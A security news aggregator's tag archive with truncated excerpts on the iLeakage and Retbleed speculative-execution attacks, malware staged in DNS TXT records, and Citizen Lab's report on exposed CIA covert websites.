Tag Archive for: Execution

New speculative execution hack can expose passwords and other sensitive data on Apple SoCs

/in


TL;DR: Researchers at Georgia Tech have developed a side-channel exploit for Apple M-series and A-series chips running macOS and iOS. The attack, cleverly dubbed iLeakage, can force Safari and other browsers to reveal Gmail messages, passwords, and other sensitive and private information.

iLeakage works similarly to the Spectre and Meltdown exploits that gave chip manufacturers so much trouble in 2018. The attack leverages the speculative execution feature of modern processors to gain access to information that would normally be hidden.

The method Georgia Tech developed is not a simple matter. While it doesn’t require specialized equipment, the attacker must have a decent knowledge of reverse engineering Apple hardware and side-channel exploits. It also involves creating a malicious website that uses JavaScript to covertly open another webpage, Gmail, for example, to scrape data into a separate popup window on the hacker’s computer. It’s not a hack that script kiddies could execute.

https://www.youtube.com/watch?v=Z2RtpN77H8o

The technique can reveal the contents of an email so long as the user is logged into Gmail (masthead video). It can also grab credentials if the victim uses a password manager’s auto-fill function (above). Theoretically, the exploit could show the hacker practically anything that goes through the processor’s speculative execution pipe. Below they demo how it can access a target’s YouTube history.

iLeakage utilizes WebKit, so it only works with Safari on Macs with an M-series chip (2020 or later). However, any browser on recent iPhones or iPads is vulnerable since Apple requires developers to use its browser engine on those operating systems. It is unclear if the method could be tweaked to use non-WebKit browsers in macOS.

Although there is no CVE tracking designator, Georgia Tech notified Apple of the security issue on September 12, 2022. Cupertino developers are still working on fully mitigating it. At the time of public disclosure, Apple had patched the vulnerability in macOS, but it’s not on by default and is considered “unstable.” The researchers listed steps to enable the…

Source…

Harnessing DNS TXT Records for Malware Execution

/in


Threat actors continue to formulate clever methods to infiltrate systems and compromise digital security. One such sophisticated technique involves the exploitation of DNS TXT (Text) records, a seemingly innocuous component of the Domain Name System (DNS). This blog post explores the mechanics of how threat actors utilize DNS TXT records to contain PowerShell commands and execute malware, shedding light on the technical intricacies and the implications for cybersecurity.

An Overview of DNS TXT Records

To understand this threat, it’s important to comprehend the basics of DNS TXT records. These records are a part of the DNS system, which acts as the Internet’s address book, translating human-readable domain names into IP addresses that computers can read, or understand. TXT records were originally intended for adding arbitrary text notes to a domain’s DNS settings. Over time, however, their versatility has been exploited by threat actors for malicious purposes.

PowerShell is a powerful scripting language built into Windows operating systems. It is legitimate and widely used for system administration tasks. Unfortunately, it has also become a favorite tool for threat actors due to its capabilities for executing complex commands and scripting.

Threat actors have turned DNS TXT records into a covert communication channel and malware delivery mechanism. Here is a simplified breakdown of the steps they take:

1. Crafting the Attack: The threat actor prepares a PowerShell command that serves as a malicious payload. This command could involve downloading additional files, running scripts, or even establishing a connection to a command and control server.

2. Encoding the Command: To obscure the malicious nature of the payload, threat actors encode the PowerShell command using various techniques like Base64 encoding. This encoding makes it more difficult for security solutions to detect the malicious content.

3. Storing the Command in DNS TXT Records: The encoded PowerShell command is inserted into the DNS TXT record associated with a domain controlled by the attacker. This can be a seemingly benign or compromised domain.

4. Triggering the Attack: The infected machine makes a DNS…

Source…

CIA’s ‘weak’ websites led to capture execution of assets in Iran, China: Report

/in


A flaw in the ‘covert’ websites of the Central Intelligence Agency compromised the US spy agency’s assets in countries like Iran and China, according to a report by security researchers. The researchers claimed that the internet security flaw led to the deaths of more than two dozen US assets in China in 2011 and 2012 while other assets in Iran were either executed or imprisoned by the regime. The research carried out by security experts at the University of Toronto’s Citizen Lab also said that the flaw could have been detected by an amateur sleuth, British website The Guardian reported. The security experts began probe following a tip from a Reuters journalist.

Joel Schectmann, the Reuters journalist had reportedly tipped the research group about a CIA asset in Iran who had been captured and later served seven years in prison after using the ‘fatally insecure network’. In 2018, two Yahoo News reporters first reported that a system used by the agency to communicate with its assets had been compromised by Iran and China.

However, the researchers said it was not publishing the full report as a move to avoid putting more CIA assets at risk. But the revelations have led to the agency’s handling of digital safety measures to come under scanner. According to the report, at least 885 websites were identified to have been used by the CIA. They were purportedly websites concerned with news, healthcare, weather etc.

The researcher group said an amateur sleuth could have mapped the entire CIA network and attributed to the US administration. According the report, these websites were active between 2004 and 2013. They were not used by the agency recently but a subset of these websites were still linked to the active employees or assets.

Calling out the ‘reckless construction’ of the infrastructure of CIA, the Citizen Lan claimed that the loophole led to the identification and the execution of the agency assets, while risking the lives of countless other individuals linked to it.

A spokesperson of the CIA said the agency takes it obligations to protect the people work with it extremely…

Source…

Researchers Devise New Speculative Execution Attacks Against Some Intel, AMD CPUs

/in


Researchers at ETH Zurich have found a way to overcome a commonly used defense mechanism against so-called speculative execution attacks targeting modern microprocessors.

In a technical paper published this week, the researchers described how attackers could use their technique — dubbed “Retbleed” — to steal sensitive data from the memory of systems with Intel and AMD microprocessors that are vulnerable to the issue. The researchers built their proof-of concept code for Linux but said some Windows and Apple computers with the affected microprocessors likely have the issue as well.

Their discovery prompted Intel and AMD to issue advisories this week describing mitigations against the new attack method. In an emailed statement, Intel said it had worked with industry partners, the Linux community, and Virtual Machine Manager (VMM) vendors to make mitigations available to customers. “Windows systems are not affected as they already have these mitigations by default,” Intel noted.

AMD said the issue the researchers had identified potentially allows arbitrary speculative code execution under certain microarchitecture conditions. “As part of its ongoing work to identify and respond to new potential security vulnerabilities, AMD is recommending software suppliers consider taking additional steps to help guard against Spectre-like attacks,” AMD said in an emailed statement. “That guidance is found in a new AMD whitepaper now available.”

Both chipmakers said they were not aware of any active exploits in the wild related to the issue that the researchers at ETH Zurich discovered and reported.

A Dangerous Attack Vector

Security researchers consider speculative execution attacks as dangerous because they give attackers a way to access and steal sensitive data — including passwords and encryption keys — in a computer’s memory. It’s an issue that is especially of concern in shared environments such as public cloud services and shared enterprise infrastructure.

Speculative execution is a performance-enhancing mechanism in modern microprocessors where instructions in code are executed in advance of when they are needed, without waiting for previous instructions to be completed. The…

Source…